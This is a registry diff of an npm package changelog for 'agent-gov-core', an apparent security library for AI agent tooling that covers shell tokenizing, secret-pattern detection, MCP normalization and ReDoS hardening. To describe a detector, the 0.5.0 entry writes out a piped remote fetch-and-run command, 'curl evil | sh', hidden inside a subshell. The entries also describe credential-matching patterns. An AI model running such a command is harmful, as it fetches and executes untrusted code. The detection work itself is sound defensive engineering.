agent-gov-core 0.7.1 → 0.8.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/CHANGELOG.md CHANGED
@@ -1,234 +1,257 @@
1
- # Changelog
2
-
3
- All notable changes to this project will be documented here. The format follows [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). Under v1.0, minor versions may include breaking changes — see [CONTRIBUTING.md](./CONTRIBUTING.md#backwards-compatibility) for the rules.
4
-
5
- ## [0.7.1] — 2026-05-22
6
-
7
- Contract-hardening patch. Two external inspection rounds (Gemini + Cody) surfaced five P0/P1 contract bugs in shipped code and one packaging fix. All addressed here. No new features; no new public exports.
8
-
9
- ### Fixed (correctness)
10
-
11
- - **`applyExceptions` is now order-independent.** Previously the FIRST matching rule won a stale expired rule listed before a broader active rule would incorrectly surface the finding as expired instead of being suppressed by the active rule. Now ALL matching rules are collected; the finding is suppressed when any matching rule is active, and only re-surfaces (with downgrade) when every matching rule has expired.
12
- - **`mergeFindings` rejects tool/finding mismatches.** Previously a forged `scope_trail` report containing `policy_mesh.*` findings would merge silently with wrong provenance. `validateReport` already rejected this; the merge path was more permissive. Now mismatches land in `invalidFindings[]` while the rest of the report still passes through.
13
- - **`normalizeMcpCommand` no longer collides on whitespace/delimiter args.** `['a b']` and `['a', 'b']` previously produced the same canonical `args=a b` because of space-joining. Same shape for env: `{A:'1|B=2'}` and `{A:'1', B:'2'}` collided under pipe-joining. Both now use JSON encoding so distinct inputs produce distinct canonicals. **This changes the canonical-string format**; PolicyMesh's `mcp_command_mismatch` will now correctly detect previously-conflated MCP configs.
14
- - **`createReport` clamps a downward-rating override upward to the implied max.** Previously `createReport({rating: 'low', findings: [critical-finding]})` returned a report that `validateReport` would then reject — the constructor and validator disagreed. Now createReport's output always round-trips through validateReport. Upward overrides (rating > implied) are still honored.
15
- - **`applyExceptions` pathPrefix now normalizes Windows backslashes and requires segment boundaries.** A finding with `src\app.ts` (Windows) now matches a `src/` prefix; a prefix `src/app` no longer over-suppresses `src/application.ts` (the match must land on a `/` boundary or be the exact path).
16
-
17
- ### Changed (visible to consumers)
18
-
19
- - **MCP canonical-string format**: `args` and `env` now serialize as JSON. Existing PolicyMesh test fixtures may need updates if they pin the exact canonical (most don't — they pin server-identity-equivalence). Golden tests in `test/golden.test.mjs` updated to the new format.
20
-
21
- ### Packaging
22
- - `docs/` directory is now included in the npm tarball. The README's link to `docs/INTEROP-OTEL.md` no longer 404s on the npm landing page.
23
-
24
- ### Cleanup
25
- - `candidateTool` in `merge.ts` now delegates to `isToolKind` from `finding.ts` instead of carrying a hardcoded tool-list regex. Removes the fourth lockstep duplication of the ToolKind enum.
26
-
27
- ### Tests
28
- - 230 total, up from 220. 10 new regression cases: order-independent exception application, all-expired downgrade chain, Windows-backslash path normalization, segment-aware prefix boundary, mergeFindings tool-mismatch rejection, MCP args whitespace collision, MCP env delimiter collision, MCP env order-independence under JSON encoding, createReport rating clamp, createReport round-trip-validates contract.
29
-
30
- ### Skipped vs Cursor inspection
31
- - Gemini #3 (secret-pattern boundary anchors): proposed fix didn't actually fix the example given (`my-transaction-id-AIza<35>` has `-` as boundary character, so a boundary anchor still allows the match). Held for further design.
32
- - Gemini #4 (hex token vs `GITHUB_SHA`): operationally rare given current consumer scanning paths; document-only follow-up.
33
- - Cursor's README/package.json description / CONTRIBUTING module list refresh: pending follow-up doc PR.
34
-
35
- ## [0.7.0] 2026-05-22
36
-
37
- **The pre-v1.0 consolidation release.** Bundles everything that was queued for v0.6.0 (report envelope + merge layer + OTel GenAI interop) plus two universal detectors promoted from consumer repos: `matchSecret` (from PolicyMesh) and `applyExceptions` (unifying PolicyMesh's `subject` and TaskBound's `allow_paths` shapes).
38
-
39
- No breaking changes to the v0.5.0 surface — additive minor bump. One npm publish covers all of it.
40
-
41
- This is the last release before v1.0 freeze. The remaining gate is consumer-side: at least one tool wiring `generateWorkflowSummary` end-to-end, then v1.0 with semver guarantees on the contract pinned by the golden tests.
42
-
43
- ### Added — Report envelope
44
- - `Report` interface — canonical multi-tool envelope with `schemaVersion`, `tool`, `rating`, optional `toolVersion`/`runId`/`conversationId`/`baseRef`/`headRef`, `findings: Finding[]`, and tool-specific extension `data`.
45
- - `Report.conversationId` (optional) agent session / PR review / thread identifier. Matches OpenTelemetry's `gen_ai.conversation.id` semantic convention so a consumer can pass the same string into both governance reports and OTel traces, then correlate them downstream.
46
- - `REPORT_SCHEMA_VERSION` const (`'1.0'`).
47
- - `schemas/report.schema.json` — JSON schema for the envelope, exposed via the package's `./schemas/report.schema.json` export.
48
- - `createReport({tool, findings, ...})` convenience constructor; sets `schemaVersion` and computes `rating` from max finding severity (unless overridden).
49
- - `maxSeverity(findings)` — helper that returns `'none' | Severity` across a finding list.
50
- - `validateReport(value)` — strict envelope check that also validates each contained finding and flags cross-field inconsistencies (e.g. rating below implied max).
51
-
52
- ### Added — Merge layer
53
- - `mergeFindings(reports, opts?)` combine N tool reports into one normalized `MergedReport`:
54
- - Deduplicates by `Finding.fingerprint`. Default policy: keep highest severity; `duplicatePolicy: 'first'` keeps the first occurrence.
55
- - Optional severity `threshold` drops findings below the requested level into a counted `droppedBelowThreshold` field.
56
- - Aggregates rating from the surviving findings, not source ratings so threshold filtering correctly demotes the merged rating.
57
- - Sorts findings by severity, highest first.
58
- - Propagates `conversationId` to the merged report iff every source agrees. Cross-conversation mixing leaves the field intentionally empty so a meta-reviewer can detect misuse.
59
- - **Never silently drops bad data**: malformed envelopes go to `invalidReports[]`, individual malformed findings go to `invalidFindings[]`. A single bad finding in a tool's report doesn't poison the rest of that report.
60
- - `MergeOptions`, `MergeSource` (with optional `conversationId`), `MergedReport` (with optional `conversationId`), `InvalidReport`, `InvalidFinding` types.
61
-
62
- ### AddedOpenTelemetry GenAI interop
63
- - `docs/INTEROP-OTEL.md` — explicit cross-walk between `agent-gov-core` types and OTel's [`gen_ai.*` semantic conventions](https://opentelemetry.io/docs/specs/semconv/gen-ai/). Maps `Report.conversationId` ↔ `gen_ai.conversation.id`, documents why we adopt one bridge field and not the whole namespace, and shows a paired-emission pattern for orgs running OTel-instrumented agents alongside governance tools.
64
-
65
- ### Added — Hardcoded secret detection (promoted from PolicyMesh)
66
- - `matchSecret(value, options?)` scans a string for provider-prefix credentials and returns `{ provider }` (never the literal credential). Built-in patterns: Anthropic, OpenAI (sk- + sk-proj-), GitHub (PAT + classic), Slack, AWS, Google, GitLab, npm, Docker, Stripe, plus a length-restricted hex token pattern gated to env/header context to avoid commit-SHA false positives.
67
- - `MatchSecretOptions.envOrHeaderContext` — opt-in flag for the hex token pattern.
68
- - `SECRET_PATTERNS` — exported read-only constant table; golden-tested so additions are non-breaking but removals require a major bump.
69
- - `SecretMatch` type.
70
- - `env:VAR` references are never flagged (Codex notation for env-var lookups).
71
-
72
- ### AddedException baselines (promoted + unified from PolicyMesh + TaskBound)
73
- - `applyExceptions(findings, exceptions, now?)` — suppress (or downgrade-on-expiry) findings matched by `kind` + optional `salientKey` + optional `pathPrefix`. PolicyMesh's `.policymesh-exceptions.json` shape and TaskBound's `.taskbound.yml` `ignore_kinds`/`allow_paths` shape both map cleanly onto this unified primitive.
74
- - Expired exceptions don't silently drop — they re-surface with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]` message prefix so stale baselines stay visible. Reason text propagates to `finding.data.exceptionReason`.
75
- - `validateException(value)`runtime check for well-formed exception entries.
76
- - `Exception`, `ApplyExceptionsResult` types.
77
-
78
- ### Tests
79
- - 57 new cases. 220 total (up from 163). Breakdown:
80
- - Report: 17 (schemaVersion pinning, rating derivation, explicit-rating override, validateReport accepting/rejecting envelope-level errors, finding-tool consistency, unknown property rejection, downgrade-allowed/upgrade-flagged rating consistency, conversationId passthrough + type check).
81
- - Merge: 14 (empty input, cross-tool combine, fingerprint dedup with `highest_severity` and `first` policies, salientKey-disambiguated findings stay separate, threshold filtering, malformed report invalidReports, malformed finding invalidFindings, severity-sorted output, aggregate-rating-reflects-survivors, source provenance, conversationId agreement/disagreement/partial-coverage propagation).
82
- - Secrets: 11 (each provider class detected, env: refs never flagged, empty/short input ignored, hex token gated to env/header context, non-hex 40-char string rejected, never-leak-literal contract, golden-pinned `SECRET_PATTERNS` provider set).
83
- - Exceptions: 15 (empty input identity, suppress by kind/salientKey/pathPrefix, perpetual-active when no expires, expired surfacing with downgrade/prefix/reason, non-matching kind/salientKey passthrough, pathPrefix without location.file safely non-matches, malformed expires treated as never-expires, future expires stays active, validateException accept/reject paths).
84
-
85
- ## [0.5.0]2026-05-22
86
-
87
- Three additive features completing the queue from Gemini's third inspection round, plus five correctness fixes from a deep code-level inspection done before publish. No breaking changes — existing exports and call signatures unchanged.
88
-
89
- Minor bump (not patch) because the surface grew: three new top-level exports.
90
-
91
- ### Fixed (pre-publish inspection sweep Gemini + Cody)
92
- - `tokenizeShell` no longer splits on `&` inside file-descriptor redirections (`2>&1`, `>&2`, `<&3`). The single-`&` separator rule now checks the preceding non-whitespace character.
93
- - `tokenizeShellDeep` no longer false-positives on `bash -c` text inside double-quoted echo arguments. Previously a whole-string regex matched `bash -c` anywhere, including data being printed. Detection now runs inside the quote-aware walk and only fires at command boundaries outside quoted regions.
94
- - `updateMultilineStringState` (TOML locator) now tracks backslash escapes inside basic multi-line strings (`"""…"""`). An escaped `\"""` inside the value no longer prematurely terminates the string-state walker, which had caused decoy keys to match. Literal strings (`'''…'''`) intentionally don't track escapes per TOML spec.
95
- - `lineOfTomlKey` now finds dotted keys nested under any prefix table not just at file root. `[a]\nb.c = 42` is now reachable as `a.b.c`. Same shape as the v0.4.4 top-level fix, generalized.
96
- - `lineOfTomlKey` now matches spaced dotted keys (`a . b . c = 1`) which `parseToml` had always accepted but the locator's compact-only regex couldn't find. Pattern now builds from individual segments joined by `\s*\.\s*`.
97
- - TOML parser correctly handles a line-ending backslash followed by trailing inline whitespace before the newline. Per spec, `"""line\ \nnext"""` strips the newline and trims leading whitespace on the next line. Previously the trailing spaces caused the backslash to be treated as a regular escape (which silently kept everything literally rather than throwing, but still wasn't spec-compliant).
98
- - `normalizeMcpCommand` now treats common boolean long-flags (`--verbose`, `--quiet`, `--debug`, `--help`, `--version`, `--force`, `--dry-run`, `--no-cache`, `--no-color`, `--no-progress`, `--json`, plus short forms `-v -V -q -h -d`) as standalone instead of greedily pairing them with the next positional. Configs with `--verbose pkg` no longer normalize differently depending on flag order.
99
- - `normalizeExecutable` (MCP) now lowercases Windows-shaped executable names (those with `\` separators or `.cmd`/`.exe`/`.bat`/`.ps1` suffix) so `NPX.CMD` and `npx` produce identical identity strings. POSIX paths keep their case because `./curl` and `./CURL` are genuinely different files there. The JSDoc had claimed this behavior since v0.1; only now does the implementation match.
100
- - `normalizeExecutable` (MCP) also drops the directory portion of paths whose basename matches a known runtime (`node`, `npx`, `python`, `bash`, etc.). `/usr/local/bin/node`, `/usr/bin/node`, `node`, and `C:\Program Files\NodeJS\node.exe` all produce `cmd=node` now. Closes a long-standing PolicyMesh `mcp_command_mismatch` false-positive class across cross-platform team setups. Custom scripts at absolute paths (`/opt/internal/orchestrator.sh`) keep their full path because path is part of their identity.
101
- - `generateWorkflowSummary` now HTML-escapes `<`, `>`, and `&` in message cells. A finding message containing `</summary>` or `<h1>` could otherwise break out of the wrapping `<details>` block and manipulate the rendered layout of the GHA step summary page.
102
-
103
- ### Added
104
- - `tokenizeShellDeep(command)` recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal per shell semantics). Conservative implementation handles common shapes, not a full shell parser; nesting depth capped at 8.
105
- - `ConfigParseError` structured parse error with `line`, `column`, `rawOffset`, and `cause`. `readJsonObjectWithSource` and `readTomlObject` now wrap their underlying parser errors with this type whenever a byte offset can be recovered. Lets downstream tools emit a `*.config_syntax_error` Finding pointing at the exact spot without recomputing line numbers.
106
- - `lineColumnOfOffset(text, offset)` utility to convert a 0-based byte offset to 1-based `{ line, column }`. Pairs with the new error type.
107
- - `generateWorkflowSummary(findings, opts?)` — Markdown summary for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks; escapes pipe/newline in message cells; truncates long messages; caps per-severity rows with an overflow indicator. Closes the GHA annotation-cap visibility gap (10 per level, 50 per run silently dropped) by guaranteeing 100% of findings appear in the workflow summary page.
108
-
109
- ### Changed
110
- - TOML parser semantic errors (`Duplicate key`, `Duplicate key in inline table`, `Duplicate table definition`, `Cannot redefine array-of-tables …`) now include `at offset N` in the message so `readTomlObject` can resolve them to a line.
111
-
112
- ### Tests
113
- - 55 new cases. 163 total (up from 108). Coverage:
114
- - tokenizeShellDeep: subshells, backticks, `-c` payloads, single-quote literal handling, nested subshells, no-op pass-through, integration with `getCommandHead`. (9 cases)
115
- - parse-error: offset line/column conversion (5 edge cases), structured wrap on JSON and TOML, `parseToml` direct call unchanged, `cause` preservation. (10 cases)
116
- - generateWorkflowSummary: empty findings, severity ordering, totals, pipe/newline escape, truncation, per-group cap with overflow, missing location, HTML escape, ampersand escape. (9 cases)
117
- - Inspection regressions: 14 cases covering `2>&1`, escaped `\"""`, table-nested dotted keys, line-ending backslash, known-boolean flags, quoted `bash -c` data, Windows case-folding, POSIX case preserved, spaced dotted keys, path de-noise across platforms, custom-script identity preservation.
118
- - **Golden compatibility tests** (`test/golden.test.mjs`): 11 cases pinning specific fingerprint hashes and `normalizeMcpCommand` canonical strings. These are the contract breaking them requires a major bump and migration plan.
119
-
120
- ## [0.4.4] 2026-05-22
121
-
122
- Cody-led inspection (third reviewer, third round) caught five issues, two of them P0 regressions I introduced in my own v0.4.2 / v0.4.3 fixes. All five fixed here.
123
-
124
- ### Fixed
125
- - **P0**: `fingerprintFinding` no longer appends an empty-string segment for findings without `salientKey`. v0.4.3 added `?? ''` which silently changed the hash for every existing finding and broke the v0.4.2 → v0.4.3 backwards-compat claim in my own changelog. Pinned by a new test that asserts the specific v0.4.2-form hash for a salient-less finding.
126
- - **P0**: TOML parser no longer rejects valid subtable headers repeated under separate array-of-tables entries. `[[fruits]] [fruits.physical] [[fruits]] [fruits.physical]` now parses correctly — each `[[fruits]]` entry resets the "already defined" status of subtable paths under that AOT. My v0.4.2 `definedTables` guard was global per-file when it should have been scoped to the current AOT entry.
127
- - `lineOfJsonStringValue` no longer matches occurrences in key position. Searching for value `"command"` in `{"command":"npx", "args":["command"]}` now returns the array-element line, not the key. Negative lookahead `(?!\s*:)` after the closing quote.
128
- - `lineOfTomlKey` now finds top-level dotted keys. `lineOfTomlKey('a.b.c = 1', 'a.b.c')` returns 1 instead of 0 the dotted-key check was gated behind `inTargetTable` which is false at file root.
129
-
130
- ### Changed
131
- - `package-lock.json` resynced to 0.4.4. Was drifting at 0.4.2 because previous releases bumped `package.json` without running `npm install` to refresh the lockfile.
132
-
133
- ### Tests
134
- - 6 new cases: pinned v0.4.2-form fingerprint hash, JSON value-vs-key disambiguation (+ colon-in-value sanity check), top-level dotted TOML keys, AOT subtable repeat across entries (+ within-entry duplicate still rejected). 108 total (up from 102).
135
-
136
- ## [0.4.3] — 2026-05-22
137
-
138
- Third Gemini-inspection round caught one confirmed bug, one disguised-as-suggestion bug, and three feature opportunities. Both bugs fixed here; the feature work is queued for v0.5.0.
139
-
140
- ### Added
141
- - `Finding.salientKey?: string` optional discriminator that participates in the fingerprint hash. Set this when a single (kind, file, line) site can produce multiple distinct findings (e.g. two suspicious imports on the same line, two MCP servers in the same JSON object). Without it, the meta-reviewer would dedupe them into one. Stable values only package name, server name, rule id; not timestamps or counters.
142
- - `CreateFindingSpec.salientKey` — pass-through to the new field.
143
- - Schema gained `salientKey` under properties (still optional, schema's `additionalProperties: false` updated to permit it).
144
-
145
- ### Fixed
146
- - `fingerprintFinding` now includes `salientKey` in the hash. Two distinct findings of the same kind on the same line with different `salientKey` values now produce different fingerprints. Backwards-compatible: findings without `salientKey` still produce stable, identical fingerprints to v0.4.2 for the (kind, file, line, column) tuple.
147
- - `lineOfTomlKey` now tracks multi-line basic (`"""`) and literal (`'''`) string state and skips key matching on lines that fall inside one. Previously a decoy key inside a multi-line string value could be matched as if it were a real assignment — confirmed bug with sharper reproduction than Gemini's first-round example.
148
-
149
- ### Tests
150
- - 7 new regression cases. 102 total (up from 95). Covers salientKey discrimination, backwards-compat for fingerprints without salientKey, validateFinding type check, decoy-in-`"""`, decoy-in-`'''`, single-line `"""..."""` (must NOT enter multiline state), and a plain-TOML sanity check that the fix doesn't over-correct.
151
-
152
- ## [0.4.2] — 2026-05-22
153
-
154
- External code review (Gemini, second pass) caught four correctness bugs and one source-cleanliness issue. All five fixed here.
155
-
156
- ### Fixed
157
- - `lineOfJsonKey` and `lineOfJsonStringValue` now JSON-encode the search input before building the regex. A caller passing the *decoded* value (e.g. `C:\Temp` from a Windows-path field) now correctly locates the JSON source bytes (`"C:\\Temp"`) instead of returning 0. Affects CapabilityEcho's `package-scripts` detector for scripts containing quotes/backslashes.
158
- - `lineOfJsonKey` and `lineOfJsonStringValue` now scan over `stripJsonComments(text)` instead of raw text. A commented-out `"command": "fake"` no longer shadows the real key on a later line. The strip is position-preserving so returned line numbers still reference the original source.
159
- - `getCommandHead` now strips wrapper flags (`sudo -E`, `env -i`) after recognizing a wrapper, so `sudo -E curl ...` returns `curl` instead of `-E`. SessionTrail/CapabilityEcho shell detectors no longer miss wrapped curl/wget invocations. Known limitation: short flags taking a value (`sudo -u user curl`) still misclassify as the value — documented and pinned by test.
160
- - TOML parser now rejects a standard table header (`[items]`) that follows an array-of-tables header (`[[items]]`) with a `Cannot redefine array-of-tables` error. Previously the standard table silently descended into the array's last entry, letting writes leak into `items[0]`. Spec compliance fix.
161
- - TOML inline-table parser now rejects duplicate keys with `Duplicate key in inline table: ...`. Previously `server = { host = "a", host = "b" }` parsed as `{ host: "b" }` — the standard-table guard wasn't mirrored on inline tables. Spec compliance fix.
162
-
163
- ### Changed
164
- - Source cleanup: the two `keys.join` calls in `src/toml.ts` now use a named `PATH_KEY_SEPARATOR = ''` constant instead of literal NUL bytes embedded in the source. Same runtime behavior (NUL as the delimiter, which is illegal in TOML keys so collision-proof), but `rg`/`grep` no longer treat the file as binary and `file(1)` reports it as proper text.
165
- - README: `rankSeverity` doc corrected was `none=0…critical=4`, actually `low=1, medium=2, high=3, critical=4`. The schema has no `none` severity.
166
- - README: `normalizeMcpCommand` signature and behavior description corrected — was listing a non-existent `serverUrl` field and claiming "resolves npx/uvx invocations" which doesn't happen. Now accurately lists: drops neutral confirm flags, strips Windows executable suffixes, sorts non-neutral flags alphabetically, preserves positional argument order, includes env + cwd in identity.
167
-
168
- ### Added
169
- - 7 new regression tests: encoded-value lookup, commented-out shadow, wrapper-flag unwrap (+ edge-case pin), AOT-vs-table mixing, inline-table duplicate keys.
170
-
171
- ## [0.4.1] — 2026-05-22
172
-
173
- ### Fixed
174
- - `fingerprintFinding` now normalizes Windows-style backslash paths to forward slashes before hashing. A finding emitted on Windows and the same finding emitted in Linux CI now collapse to the same fingerprint — previously they'd diverge and break cross-platform dedupe. Caught by external code review.
175
- - `normalizeMcpCommand` now preserves the relative order of positional arguments that appear after a flag. Previously `['--flag', 'x', 'a', 'b']` and `['--flag', 'x', 'b', 'a']` collapsed to the same canonical identity because the post-flag positional keys were co-sorted with flag pairs. PolicyMesh's `mcp_command_mismatch` would under-report under this bug. Caught by external code review.
176
-
177
- ### Changed
178
- - `stripJsonComments` and `stripTrailingCommas` no longer carry the dead `"'"` (single-quote) state in their string tracker — JSON strings are double-quoted only. Pure type/comment cleanup, no behavior change. Caught by external code review.
179
-
180
- ### Added
181
- - Regression tests for both fixes:
182
- - `fingerprintFinding`: identical fingerprint across Windows and POSIX path separators.
183
- - `normalizeMcpCommand`: differing post-flag positional order produces different identities; flag order independence preserved.
184
- - `CHANGELOG.md` is now shipped in the npm tarball.
185
-
186
- ### Internal
187
- - `package.json` `files` allow-list trimmed to exclude `.js.map` / `.d.ts.map` sourcemaps from the published tarball. The maps referenced `src/*.ts` source files that aren't shipped, so they were dead links anyway. Tarball is ~27% smaller (32.4 kB ~23.6 kB).
188
-
189
- ## [0.4.0]2026-05-22
190
-
191
- ### Added
192
- - `JsonObjectWithSource.value` new field that mirrors `json`, populated identically. Use this in new code; `json` is kept as a populated alias.
193
- - `TomlObjectWithSource.value` — same pattern for the TOML reader.
194
- - `lineOfTomlKey(text, dottedKey, scope?)` optional `scope: ByteRange` parameter for parity with `lineOfJsonKey` and `lineOfJsonStringValue`. Useful when an outer locator has already pinned a parent table's range and you want to find a leaf inside it without false matches from a sibling table.
195
-
196
- ### Deprecated
197
- - `JsonObjectWithSource.json` prefer `value`. Will be removed in a future major version.
198
- - `TomlObjectWithSource.toml` prefer `value`. Will be removed in a future major version.
199
-
200
- ## [0.3.1] — 2026-05-22
201
-
202
- ### Added
203
- - Secondary entry point `agent-gov-core/test-utils` with fixtures the suite repos all hand-rolled:
204
- - `writeFiles(dir, fileMap)` write a path-to-content map, creating parent directories.
205
- - `makeGitRepo({initialFiles?, initialMessage?})` `{repo, commit, head, git, cleanup}` — temp git repo on branch `main` with placeholder identity. `commit()` applies files and commits, returning the new SHA.
206
- - `makeOldNewFixture({old, new})` `{old, new, cleanup}` two sibling temp directories for diff-mode CLI tests.
207
-
208
- ## [0.3.0] — 2026-05-22
209
-
210
- ### Added
211
- - `createFinding({tool, name, severity, message, ...})` — convenience constructor that calls `kind()` and `fingerprintFinding()` for you.
212
- - `fingerprintFinding(finding)`16-char hex hash of `(kind, file, line, column)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe.
213
- - `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`.
214
- - `CreateFindingSpec` and `FindingValidationResult` types.
215
- - JSDoc `@example` blocks on `tokenizeShell`, `getCommandHead`, `normalizeMcpCommand`, `emitFindingAnnotation`.
216
- - JSDoc on `ToolKind` explaining the schema/runtime lockstep contract.
217
-
218
- ## [0.2.0] — earlier
219
-
220
- ### Added
221
- - `kind(tool, name)` typed helper that builds `<tool>.<slug>` strings.
222
- - `isNamespacedKind(value)` runtime guard matching the JSON schema's `kind` pattern.
223
-
224
- ### Changed
225
- - Schema regex tightened to require namespaced kinds: `^(scope_trail|policy_mesh|capability_echo|task_bound|session_trail)\.[a-z0-9_]+$`.
226
-
227
- ## [0.1.2]earlier
228
-
229
- ### Changed
230
- - `normalizeMcpCommand` drops neutral confirm flags (`-y`, `--yes`) before canonicalization, so `npx -y foo` and `npx foo` produce the same identity.
231
-
232
- ## [0.1.0] — earlier
233
-
234
- Initial release. Finding schema, JSONC/TOML readers, line locators, MCP normalization, shell tokenization, and GitHub Action helpers.
1
+ # Changelog
2
+
3
+ All notable changes to this project will be documented here. The format follows [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). Under v1.0, minor versions may include breaking changes — see [CONTRIBUTING.md](./CONTRIBUTING.md#backwards-compatibility) for the rules.
4
+
5
+ ## [0.8.1] — 2026-05-22
6
+
7
+ ReDoS audit patch. Zero source changes every regex evaluator in `src/secrets.ts`, `src/shell.ts`, `src/locators.ts`, and `src/mcp.ts` was already safe by construction (no nested quantifiers over overlapping character classes; disjoint alternation; anchored where applicable). Ships durable verification + threat-model documentation so future contributors don't have to re-derive the analysis.
8
+
9
+ ### Added
10
+ - [`docs/SECURITY.md`](./docs/SECURITY.md) — threat model for regex evaluation on untrusted input, plus what we don't protect against (the `dottedKey` argument to `lineOfTomlKey` is treated as developer-supplied; the SessionTrail-class user-supplied-pattern vector does not apply because the library never accepts a pattern from a caller). Bundled in the published tarball via the existing `files: ["docs"]` entry.
11
+ - [`test/redos.test.mjs`](./test/redos.test.mjs) adversarial harness. 18 tests, each exercising one regex evaluator against ~100 KB of input shaped to trigger the worst backtracking path the pattern could exhibit (long benign, long near-miss, nested-quantifier-style). Each call must complete under a 50 ms wall-clock budget. Current worst case is the `bash -c` payload extractor at <10 ms three orders of magnitude clear of catastrophic backtracking.
12
+
13
+ ### Tests
14
+ - 254 total, up from 236. 18 new ReDoS pinning tests covering every regex evaluator in the four audited files.
15
+
16
+ ## [0.8.0] — 2026-05-22
17
+
18
+ Anchor release for the cross-tool meta-reviewer. Additive minor bump — one new optional field, one new validator. No breaking changes; all 0.7.x consumers continue to work unchanged.
19
+
20
+ ### Added
21
+ - `MergedReport.workflowName` (optional) — populated when `mergeFindings(reports, { workflowName })` is called. Cross-walks to OpenTelemetry's [`gen_ai.workflow.name`](./docs/INTEROP-OTEL.md) semantic convention so a meta-reviewer rolling up N tool reports for one workflow run can carry the same string downstream observability already uses. Never inferred — the meta-reviewer caller owns it.
22
+ - `MergeOptions.workflowName?: string` opts-in entry point for the field above.
23
+ - `validateMergedReport(value)` — strict envelope check for `MergedReport`. Mirrors `validateReport` on the source side so a meta-reviewer that round-trips merged output through JSON can verify it the same way.
24
+
25
+ ### Tests
26
+ - 236 total, up from 230. 6 new cases: workflowName round-trip, workflowName omission default, validateMergedReport happy path, validateMergedReport structural/rating rejection, validateMergedReport counter/unknown-property rejection, validateMergedReport workflowName type rejection.
27
+
28
+ ## [0.7.1] 2026-05-22
29
+
30
+ Contract-hardening patch. Two external inspection rounds (Gemini + Cody) surfaced five P0/P1 contract bugs in shipped code and one packaging fix. All addressed here. No new features; no new public exports.
31
+
32
+ ### Fixed (correctness)
33
+
34
+ - **`applyExceptions` is now order-independent.** Previously the FIRST matching rule won — a stale expired rule listed before a broader active rule would incorrectly surface the finding as expired instead of being suppressed by the active rule. Now ALL matching rules are collected; the finding is suppressed when any matching rule is active, and only re-surfaces (with downgrade) when every matching rule has expired.
35
+ - **`mergeFindings` rejects tool/finding mismatches.** Previously a forged `scope_trail` report containing `policy_mesh.*` findings would merge silently with wrong provenance. `validateReport` already rejected this; the merge path was more permissive. Now mismatches land in `invalidFindings[]` while the rest of the report still passes through.
36
+ - **`normalizeMcpCommand` no longer collides on whitespace/delimiter args.** `['a b']` and `['a', 'b']` previously produced the same canonical `args=a b` because of space-joining. Same shape for env: `{A:'1|B=2'}` and `{A:'1', B:'2'}` collided under pipe-joining. Both now use JSON encoding so distinct inputs produce distinct canonicals. **This changes the canonical-string format**; PolicyMesh's `mcp_command_mismatch` will now correctly detect previously-conflated MCP configs.
37
+ - **`createReport` clamps a downward-rating override upward to the implied max.** Previously `createReport({rating: 'low', findings: [critical-finding]})` returned a report that `validateReport` would then reject the constructor and validator disagreed. Now createReport's output always round-trips through validateReport. Upward overrides (rating > implied) are still honored.
38
+ - **`applyExceptions` pathPrefix now normalizes Windows backslashes and requires segment boundaries.** A finding with `src\app.ts` (Windows) now matches a `src/` prefix; a prefix `src/app` no longer over-suppresses `src/application.ts` (the match must land on a `/` boundary or be the exact path).
39
+
40
+ ### Changed (visible to consumers)
41
+
42
+ - **MCP canonical-string format**: `args` and `env` now serialize as JSON. Existing PolicyMesh test fixtures may need updates if they pin the exact canonical (most don't — they pin server-identity-equivalence). Golden tests in `test/golden.test.mjs` updated to the new format.
43
+
44
+ ### Packaging
45
+ - `docs/` directory is now included in the npm tarball. The README's link to `docs/INTEROP-OTEL.md` no longer 404s on the npm landing page.
46
+
47
+ ### Cleanup
48
+ - `candidateTool` in `merge.ts` now delegates to `isToolKind` from `finding.ts` instead of carrying a hardcoded tool-list regex. Removes the fourth lockstep duplication of the ToolKind enum.
49
+
50
+ ### Tests
51
+ - 230 total, up from 220. 10 new regression cases: order-independent exception application, all-expired downgrade chain, Windows-backslash path normalization, segment-aware prefix boundary, mergeFindings tool-mismatch rejection, MCP args whitespace collision, MCP env delimiter collision, MCP env order-independence under JSON encoding, createReport rating clamp, createReport round-trip-validates contract.
52
+
53
+ ### Skipped vs Cursor inspection
54
+ - Gemini #3 (secret-pattern boundary anchors): proposed fix didn't actually fix the example given (`my-transaction-id-AIza<35>` has `-` as boundary character, so a boundary anchor still allows the match). Held for further design.
55
+ - Gemini #4 (hex token vs `GITHUB_SHA`): operationally rare given current consumer scanning paths; document-only follow-up.
56
+ - Cursor's README/package.json description / CONTRIBUTING module list refresh: pending follow-up doc PR.
57
+
58
+ ## [0.7.0] 2026-05-22
59
+
60
+ **The pre-v1.0 consolidation release.** Bundles everything that was queued for v0.6.0 (report envelope + merge layer + OTel GenAI interop) plus two universal detectors promoted from consumer repos: `matchSecret` (from PolicyMesh) and `applyExceptions` (unifying PolicyMesh's `subject` and TaskBound's `allow_paths` shapes).
61
+
62
+ No breaking changes to the v0.5.0 surface additive minor bump. One npm publish covers all of it.
63
+
64
+ This is the last release before v1.0 freeze. The remaining gate is consumer-side: at least one tool wiring `generateWorkflowSummary` end-to-end, then v1.0 with semver guarantees on the contract pinned by the golden tests.
65
+
66
+ ### AddedReport envelope
67
+ - `Report` interface canonical multi-tool envelope with `schemaVersion`, `tool`, `rating`, optional `toolVersion`/`runId`/`conversationId`/`baseRef`/`headRef`, `findings: Finding[]`, and tool-specific extension `data`.
68
+ - `Report.conversationId` (optional) agent session / PR review / thread identifier. Matches OpenTelemetry's `gen_ai.conversation.id` semantic convention so a consumer can pass the same string into both governance reports and OTel traces, then correlate them downstream.
69
+ - `REPORT_SCHEMA_VERSION` const (`'1.0'`).
70
+ - `schemas/report.schema.json` JSON schema for the envelope, exposed via the package's `./schemas/report.schema.json` export.
71
+ - `createReport({tool, findings, ...})` — convenience constructor; sets `schemaVersion` and computes `rating` from max finding severity (unless overridden).
72
